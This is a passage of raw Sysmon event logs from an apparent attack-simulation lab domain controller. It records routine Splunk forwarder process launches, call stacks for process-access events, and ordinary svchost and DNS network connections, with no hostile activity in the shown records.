Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.790{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.803{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 354300x80000000000000008115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.779{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53596-false104.117.196.27a104-117-196-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000008114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.561{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53595-false104.117.196.27a104-117-196-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000008113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.349{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53594-false20.189.118.208-80http 354300x80000000000000008112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.109{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62564- 354300x80000000000000008111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.105{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53593-false104.117.196.27a104-117-196-27.deploy.static.akamaitechnologies.com80http 
354300x80000000000000008110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.100{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54657- 10341000x80000000000000008109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D400-00000000AE01}5468C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.509{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D400-00000000AE01}5468C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-64ED-6064-D300-00000000AE01}57005768C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64ED-6064-D400-00000000AE01}5468C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.514{266CAFBE-64ED-6064-D400-00000000AE01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64ED-6064-D300-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServerListener: --no-log 10341000x80000000000000008101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D300-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D300-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-64ED-6064-D200-00000000AE01}65764944C:\Windows\system32\cmd.exe{266CAFBE-64ED-6064-D300-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.507{266CAFBE-64ED-6064-D300-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServerListener: --no-logC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64ED-6064-D200-00000000AE01}6576C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-log 10341000x80000000000000008093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D200-00000000AE01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D200-00000000AE01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64ED-6064-D200-00000000AE01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+13ac4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program 
Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.501{266CAFBE-64ED-6064-D200-00000000AE01}6576C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 10341000x80000000000000008085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D100-00000000AE01}5472C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
